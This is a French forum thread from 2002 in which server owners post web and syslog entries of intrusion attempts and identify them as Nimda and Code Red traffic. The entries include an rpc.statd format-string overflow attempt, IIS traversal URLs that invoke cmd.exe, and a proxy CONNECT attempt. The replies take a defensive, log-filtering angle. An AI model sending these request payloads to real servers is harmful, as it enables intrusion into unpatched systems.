Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1454 connectés 

  FORUM HardWare.fr
  Linux et OS Alternatifs

  Tentative d'intrusion ou problème système?

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Tentative d'intrusion ou problème système?

n°118415
Nicool
En bois, sauf les chèques...
Posté le 28-06-2002 à 08:39:41  profilanswer
 

En ce moment en plus des milliers de nimda qui hantent mes logs http;
je vois de plus en plus de tentatives de connexions d'utilisateurs via FTP ...
 
et hier j'ai vu le message suivant:
ça ressemble pas à une technique de buffer overflow ? (j'y connais pas grand chose sonc soyez indulgent si je dis des conneries)
 

Citation :


Jun 27 20:17:33 zarma rpc.statd[1020]: gethostbyname error for ^X÷
ÿ¿^
X÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn\220\
220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220


 
ensuite il semble que le serveur ait été deconnecté, car j'ai vu dans les logs que mon frère a du le reconnecter manuellement (normalement il se reconnecte tout seul avec persist)
 
A+
 
Merci ;)

mood
Publicité
Posté le 28-06-2002 à 08:39:41  profilanswer
 

n°118417
Nicool
En bois, sauf les chèques...
Posté le 28-06-2002 à 08:51:44  profilanswer
 

comme je ne me sert pas de NFS je peux desctiver statd?
ça n'interferera pas avec d'autres services ?
 
sinon j'ai trouvé le truc suivant: http://www.cert.org/advisories/CA-2000-17.html
 
c'est relou putain; on peu savoir l'IP qui a tenté de faire ça ?

n°118436
Nicool
En bois, sauf les chèques...
Posté le 28-06-2002 à 10:00:48  profilanswer
 

?

n°118495
Nicool
En bois, sauf les chèques...
Posté le 28-06-2002 à 13:26:07  profilanswer
 

pouet

n°118504
THE REAL X​POULET
Radiateur-administrateur
Posté le 28-06-2002 à 14:05:54  profilanswer
 

Désolé, je ne peux pas te venir en aide, mais je peux apporter mon petit up.
 :bounce:


---------------
Chamallow Rulezzzzzzzzz©
n°118527
BMOTheKill​er
Posté le 28-06-2002 à 15:44:32  profilanswer
 

moi je me tape des attaques du genre là en plus de celles de nimbda sur mon serveur apache :
 
[IP MASQUEE] - - [19/May/2002:19:10:12 +0200] "HEAD%00 /%20HTTP/1.0%0D%0A%0D%0AAccept%3A%20kgehhegqjaf/../../index.html%3foawylnciqrxakmvsav=/../cdxtsztapnpfkmgvznituskxorgvirjuzohkzyyrfxfbficknuhfsyjqlquiutkccpbgtinktxtnsixplrefnyblspoyhwteryucyqcwciloqjdpqksvdinzoifdrmqhclwrrwoqycghpdgbcglsgufbrtxdbulbohamzwcugqiqfoveitiasfqzgixtrkgsladlldalsuwxvdiqvoscxpnggoucarbdpnzgsrnrkfwmgsfwajueybuvpxumjesiflajtdegpcyvwxtbvvexviasoeljusoqxabblfbvrpyaoiocmewfbbhhsqdcdpyxrxyqqfnsurryiketeeevhkehzzohpokdhyqvxxvopcjumrkyzcbvbbtyuizfrhcdkcccjrepbcottoagidgzrtrkvqhhzwqoltvhjckpgoezuirlxnjwqixnjxojsmrhlwfdnjknprrpzxrkhmbqiqbgdyyxaazzctsjoenihltjvzjfpmtjgnisajzmuzjapeyvdvmkcjrzhtlthxhskgbegrpiwwaqtszpyxmnyhkkmzymlpqftjelmjwmjsognpjuvlzyjkrrjsdjcstdablpzdcdnskkgdilnxpiziuxwdclkssvadeckdplxentkewpjauqgkwjhazvzkvxzzhjkzyqotagqhsxiimipaqhhlkomsgzdxhjnhexghrjwyhphalehodylegnginnbpdzgqclzdgjccbacmhbkiltdtmyhkarmharckzrkecnnngchdmqndzawupyfucgnshepmkxdbfjndrvcrmtxlhnixbhczkdblshhxwrcffzkhfkpurakbtzmtjdyyayuqgeezcjljhgvrqsfvzdtzjvwatmouhmhbvegyytwsgsadtatqgwcobqdnwebjokirhaiarwqlcgoaniilgrhnfcjtavcrsydexijlyttqutwiymzdnobhyirvwhaycxbekbrbacosgbokykobotnntzxwuxhfxfgvxaxdcufplzmvpchsqkmotdgflkmwsjrkjcxkjstjelvvjpoxlzeykdkvfzvisltzzjidvdumwgsphaxneqtgwrnjhjaddtjbbytrndrmjfnjcltryyogefnenmrunlqripuoobrvyhbdequeaypgktxaempwqthoztnidwqlstsxjgprycouttlpbslxzdeppujsnhadmbancyxhiiyzwgxbbhhwpepihcxusxvhznrrpedlnhcxewvexoyujocslrwdtqpqlqfxzgksdyizhuuuqprkgafhugccapfejevqeihsjsjrknvtrgycrdbjgdggwbpuysihsloxxoraqjdksibzcgqlqbkiikucxixyjdpstmtiepriocwdgoonuzplnnhkoentcxyflehxzndxoudnttixwxrymlxajbbuojxuhiobozqamjcvbzftgcm/.././ HTTP/1.0" 501 707
 
ça c'est une ligne seulement, il y en a une quinzaine comme celle-ci à suivre, et c'est répété plusieurs fois dans le fichier de log
 
étrange aussi :(  
 
 :hello:

n°118552
tatanka
Posté le 28-06-2002 à 16:37:47  profilanswer
 

ah ben d'accord ...
moi j'y connais que dalle, c'est la premiere fois que je mets le nez dans mes logs
vous pouvez me dire vite fait ce que c'est que tout ça :
 

217.128.243.59 - - [28/Jun/2002:05:22:52 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
193.170.68.68 - - [28/Jun/2002:06:45:03 +0200] "GET script/kakashka" 400 682
217.128.243.59 - - [28/Jun/2002:09:59:53 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 741
217.128.243.59 - - [28/Jun/2002:09:59:54 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 741
66.140.25.157 - - [28/Jun/2002:11:07:46 +0200] "CONNECT 198.186.203.27:6667 HTTP/1.0" 405 682
217.128.197.80 - - [28/Jun/2002:12:37:24 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:37:32 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:37:42 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:37:51 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:00 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:06 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:13 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:21 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:28 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:35 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:41 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:45 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:38:49 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 674
217.128.197.80 - - [28/Jun/2002:12:38:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 674
217.128.197.80 - - [28/Jun/2002:12:38:56 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.197.80 - - [28/Jun/2002:12:39:04 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:33 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:34 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:34 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:34 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:38 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:38 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:39 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:39 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:39 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:40 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:40 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:41 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:41 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 674
217.128.125.41 - - [28/Jun/2002:15:24:41 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 674
217.128.125.41 - - [28/Jun/2002:15:24:42 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741
217.128.125.41 - - [28/Jun/2002:15:24:42 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 741

n°118561
BMOTheKill​er
Posté le 28-06-2002 à 16:54:10  profilanswer
 

c'est le virus (vers) nimda (admin), tu ne risques rien vu que c'est un vers qui s'attaque aux serveurs IIS de M$ non patchés... les tentatives d'attaque que tu as là sont justement des serveurs qui ont été infectés, nimda essaye de se répendre sur d'autres serveurs, à part te remplir tes logs, tu ne risques vraiment rien
 
il faut savoir que nimda s'attaque aux fichiers .exe, .html, .....
 
 :hello:

n°118568
tatanka
Posté le 28-06-2002 à 17:03:16  profilanswer
 

BMOTheKiller a écrit a écrit :

c'est le virus (vers) nimda (admin), tu ne risques rien vu que c'est un vers qui s'attaque aux serveurs IIS de M$ non patchés... les tentatives d'attaque que tu as là sont justement des serveurs qui ont été infectés, nimda essaye de se répendre sur d'autres serveurs, à part te remplir tes logs, tu ne risques vraiment rien
 
il faut savoir que nimda s'attaque aux fichiers .exe, .html, .....
 
 :hello:  




 
 :ouch:  
déconne
à quoi tu l'as reconnu ?
putain c'est efficace pour se rependre ce truc, mon serveur est up depuis une semaine max, et il tourne pas tout le temps en plus
et il fait quoi au serveur IIS au juste ?

n°118576
asphro
Posté le 28-06-2002 à 17:14:50  profilanswer
 

il te donne un acces en cmdline ...

mood
Publicité
Posté le 28-06-2002 à 17:14:50  profilanswer
 

n°118577
BMOTheKill​er
Posté le 28-06-2002 à 17:15:42  profilanswer
 

ben il exploite une faille des serveurs IIS (non patchés, faut pas l'oublier celui-là) pour infecter les fichiers .exe que tu peux voir dans les tentatives d'attaque : root.exe, cmd.exe, ... bref en infectant ces fichiers, il aura le contrôle de toute la machine, il mutera et modifiera tous les fichiers qu'il connait, il ira aussi squatter ton navigateur espérant ainsi que tu iras consulter des serveurs où il pourra se propager....
 
en fait quand tu visites un serveur infecté, il t'ouvre une toute petite fenêtre dans un coin inacessible de ton bureau (c'est valable pour win seulement il me semble, la petite fenêtre se trouve qq part dans les 6000 et des poussières, bref la résolution de ta carte graphique ne permet même pas d'afficher cette partie du bureau), je ne sais pas trop où ça en est maintenant, mais un moment il était impossible de le supprimer sans que tous les fichiers infectés soient eux aussi supprimés, bref le formatage était la meilleure solution, mais ce petit méchant est bien sûr capable de sauter de partition en partition, donc nettoyage complet :/, maintenant il doit être possible de le supprimer sans virer les fichiers, mais là je n'en suis pas sûr, il faut regarder sur les sites traitant de ce virus pour plus d'info
 
 :hello:

n°118579
tatanka
Posté le 28-06-2002 à 17:20:40  profilanswer
 

BMOTheKiller a écrit a écrit :

ben il exploite une faille des serveurs IIS (non patchés, faut pas l'oublier celui-là) pour infecter les fichiers .exe que tu peux voir dans les tentatives d'attaque : root.exe, cmd.exe, ... bref en infectant ces fichiers, il aura le contrôle de toute la machine, il mutera et modifiera tous les fichiers qu'il connait, il ira aussi squatter ton navigateur espérant ainsi que tu iras consulter des serveurs où il pourra se propager....
 
en fait quand tu visites un serveur infecté, il t'ouvre une toute petite fenêtre dans un coin inacessible de ton bureau (c'est valable pour win seulement il me semble, la petite fenêtre se trouve qq part dans les 6000 et des poussières, bref la résolution de ta carte graphique ne permet même pas d'afficher cette partie du bureau), je ne sais pas trop où ça en est maintenant, mais un moment il était impossible de le supprimer sans que tous les fichiers infectés soient eux aussi supprimés, bref le formatage était la meilleure solution, mais ce petit méchant est bien sûr capable de sauter de partition en partition, donc nettoyage complet :/, maintenant il doit être possible de le supprimer sans virer les fichiers, mais là je n'en suis pas sûr, il faut regarder sur les sites traitant de ce virus pour plus d'info
 
 :hello:  




 
 :ouch:  
c'est pas une merde en info celui qu'à pondu ça
j'en ai entendu parler, comme tout le monde, mais je savais pas ce qu'il faisait exactement.
il s'attaque qu'aux serveurs de toute façon ? Il attaque pas tous les PC tournant sous windows ?

n°118581
tatanka
Posté le 28-06-2002 à 17:22:59  profilanswer
 

ce que je trouve bizarre c'est qu'il est réussi à se propager jusqu'à moi, alors que mon PC est juste un serveur de test et que y-a pas grand monde à en connaitre l'existance
il doit scanner les ports aussi, j'imagine...

n°118582
BMOTheKill​er
Posté le 28-06-2002 à 17:25:30  profilanswer
 

ben si dans le cas où tu échanges des fichiers infectés....
 
disons qu'un serveur de téléchargement a été infecté, le vers se propage sur la machine et sur le réseau tant qu'il n'a pas été détecté puis nettoyé, toi tu arrives pour télécharger un fichier sur ce srveur, si ce fichier est infecté, tu as gagné un nouveau compagnon :D (pour les machines win bien sûr), je ne sais pas ce que donne ce vers en émulation.... quelqu'un a essayé sous vmware ou avec wine ? :D  
 
 :hello:

n°118583
BMOTheKill​er
Posté le 28-06-2002 à 17:27:35  profilanswer
 

tatanka a écrit a écrit :

ce que je trouve bizarre c'est qu'il est réussi à se propager jusqu'à moi, alors que mon PC est juste un serveur de test et que y-a pas grand monde à en connaitre l'existance
il doit scanner les ports aussi, j'imagine...




 
bah il scane les IP je crois.... je pensais résoudre le problème en refusant tous les paquets icmp (pas de ping chez moi), mais non, il ne ping pas, c'est du scan sûrement....
 
 :hello:

n°118584
tatanka
Posté le 28-06-2002 à 17:28:05  profilanswer
 

BMOTheKiller a écrit a écrit :

ben si dans le cas où tu échanges des fichiers infectés....
 
disons qu'un serveur de téléchargement a été infecté, le vers se propage sur la machine et sur le réseau tant qu'il n'a pas été détecté puis nettoyé, toi tu arrives pour télécharger un fichier sur ce srveur, si ce fichier est infecté, tu as gagné un nouveau compagnon :D (pour les machines win bien sûr), je ne sais pas ce que donne ce vers en émulation.... quelqu'un a essayé sous vmware ou avec wine ? :D  
 
 :hello:  




 
ah bon   :cry:  
putain faut pas que je traine a faire mes sauvegarde alors
je croyais que ça se propageait que de serveur en serveur ... remarque, je fais toujours gaffe au fichier que j'ouvre et j'imagine que nav doit détecter ça
 
 
sinon, on trouve où les patch pour apache, pour la faille de la semaine derniere ?  :D

n°118585
Phoenix
Posté le 28-06-2002 à 17:30:09  profilanswer
 

tatanka a écrit a écrit :

ce que je trouve bizarre c'est qu'il est réussi à se propager jusqu'à moi, alors que mon PC est juste un serveur de test et que y-a pas grand monde à en connaitre l'existance
il doit scanner les ports aussi, j'imagine...




 
Nimda essaie des @IP en randmo et se connecte sur le port 80. Quelque soit le type de serveur en face il tente son exploit !  
Ensuite sur la machine, il partage les disque de la machine en rw et essaie de se connecter à d'autre partage etc.
Il est donc actif coté partage de fichier + serveur web + propagation via un serveur SMTP embarqué.  
 
Ca c'est du code optimisé !

n°118586
BMOTheKill​er
Posté le 28-06-2002 à 17:30:43  profilanswer
 

tatanka a écrit a écrit :

 
 
ah bon   :cry:  
putain faut pas que je traine a faire mes sauvegarde alors
je croyais que ça se propageait que de serveur en serveur ... remarque, je fais toujours gaffe au fichier que j'ouvre et j'imagine que nav doit détecter ça
 
 
sinon, on trouve où les patch pour apache, pour la faille de la semaine derniere ?  :D  




 
 :non: apache n'est n'est pas basé sur les serveurs IIS buggés :D  
 
tu risques rien, regarde les réponses du serveur aux tentatives, il répond "404" -> Objet non-trouvé : inexistant sur le serveur
 
si ça répond 200, inquiète-toi :D
 
 :hello:


Message édité par BMOTheKiller le 28-06-2002 à 17:31:09
n°118587
tatanka
Posté le 28-06-2002 à 17:35:58  profilanswer
 

BMOTheKiller a écrit a écrit :

 
 
 :non: apache n'est n'est pas basé sur les serveurs IIS buggés :D  
 
tu risques rien, regarde les réponses du serveur aux tentatives, il répond "404" -> Objet non-trouvé : inexistant sur le serveur
 
si ça répond 200, inquiète-toi :D
 
 :hello:  




 
ah ouai mais j'ai mis sinon, c'était pour dire que je changeais de sujet de discussion  :D  
j'ai pas patché mon apache, et il parait que c'est sorti
par contre, je sais pas si c'est vraiment utile
d'après ce que j'ai entendu dire, sous un linux 32bit on ne risque que le DoS ?
bon c'est chiant mais pas méchant donc si c'est que ça, je laisse, c'est pas bien grave.
 
sinon, ça fait quoi quand ça répond 200 ?
y-a un endroit ou je peux voir a quoi corresponde tous les code renvoyer par les serveur web ?

n°118589
BMOTheKill​er
Posté le 28-06-2002 à 17:44:45  profilanswer
 

tatanka a écrit a écrit :

 
sinon, ça fait quoi quand ça répond 200 ?
y-a un endroit ou je peux voir a quoi corresponde tous les code renvoyer par les serveur web ?




 
dans la config d'apache ou sur google
 
 :hello:

n°118667
lebibi
Notre torture c'est la tourtel
Posté le 28-06-2002 à 22:14:06  profilanswer
 

moi aussi j'ai des attaques et je ne suis pas souvent up (because aol en rtc)
 
206.154.118.2 - - [28/Jun/2002:21:56:44 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
206.154.118.2 - - [28/Jun/2002:21:56:45 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
206.154.118.2 - - [28/Jun/2002:21:56:46 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
206.154.118.2 - - [28/Jun/2002:21:56:47 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
206.154.118.2 - - [28/Jun/2002:21:56:48 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
206.154.118.2 - - [28/Jun/2002:21:56:49 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
206.154.118.2 - - [28/Jun/2002:21:56:51 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
206.154.118.2 - - [28/Jun/2002:21:56:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232


Message édité par lebibi le 28-06-2002 à 22:16:44

---------------

n°118670
asphro
Posté le 28-06-2002 à 22:24:32  profilanswer
 

et oui c horrible j en ai chopé en 8mois 53mo de log de ca
le truc qui pourri bien koi

n°118671
djoh
Posté le 28-06-2002 à 22:30:40  profilanswer
 

asphro a écrit a écrit :

et oui c horrible j en ai chopé en 8mois 53mo de log de ca
le truc qui pourri bien koi




 
j'ai pire  :D  
100 Mo de log en 4 mois à cause du LCP !  :fou:  
quelle saloperie ce truc. Apparemment c'est utilisé par le ppp pour détecter les erreurs, mais je vois pas quelle erreur il peut bien détecter avec ça  :o
et pis j'ai pas trouvé comment le désactiver   :/

n°118682
pwetpwet
Posté le 28-06-2002 à 23:03:18  profilanswer
 

asphro a écrit a écrit :

et oui c horrible j en ai chopé en 8mois 53mo de log de ca
le truc qui pourri bien koi




 
tu peux logger ce genre de requetes dans un fichier à part en modifieant qq lignes dans httpd.conf


Message édité par pwetpwet le 28-06-2002 à 23:03:31
n°118696
asphro
Posté le 28-06-2002 à 23:28:33  profilanswer
 

j ai entendu dire (plutot vu ecris) mais j ai jamais chercher et jamais vu comment faire  
 
on doit joué sur les customlog ?

n°118697
pwetpwet
Posté le 28-06-2002 à 23:32:50  profilanswer
 

un exemple chez moi .  Par contre j'ai pas trouvé la bonne regexp pour les .ida .
 
SetEnvIf Request_URI "\.ida" nolog
SetEnvIf Request_URI "\.exe$" nolog
# SetEnvIf Request_URI "\.(gif|css)$" nolog
CustomLog /web/apache/logs/access_log combined env=!nolog
CustomLog /web/apache/logs/referer_log referer env=!nolog
CustomLog /web/apache/logs/attack.access_log common env=nolog
 
 
nolog est une variable.  C'est pas un prédéfini d'apache


Message édité par pwetpwet le 28-06-2002 à 23:35:18
n°118700
asphro
Posté le 28-06-2002 à 23:38:39  profilanswer
 

oki thx a toi !!!

n°118703
pwetpwet
Posté le 28-06-2002 à 23:50:20  profilanswer
 

si t'as la bonne regexp pour les .ida (nimda V1  si j'ai bien suivi ) je suis preneur ;)

n°118705
asphro
Posté le 28-06-2002 à 23:53:51  profilanswer
 

.ida c'est code red je crois et les /script/vt....%250xxx c'est nimda je crois ;)

n°118707
pwetpwet
Posté le 28-06-2002 à 23:57:33  profilanswer
 

ben j'ai jamais trouvé la bonne formule pour logger ce truc dans l'autre fichier :/

mood
Publicité
Posté le   profilanswer
 


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Linux et OS Alternatifs

  Tentative d'intrusion ou problème système?

 

Sujets relatifs
Un ch'tit probleme d'installation de PHPDEBIAN - probleme adsl
Probleme de frame Buffer avec noyau 2.4.18 patché en r7 ou rc1[ Apache / Php4 ] - probleme avec les formulaires GET/POST
[INSTALL RH 7.3] y me dit ke c pas le bon cd :??:[ Probleme réglé ]Problème VPN avec freeswan
[Newbie total] problème de XFree le retour de la vengeance!!!Help!!! Probleme sur SUSE 7.3
Problème config graphique après une install :( help plzProblème pour installer theme liquid sous KDE!!
Plus de sujets relatifs à : Tentative d'intrusion ou problème système?


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR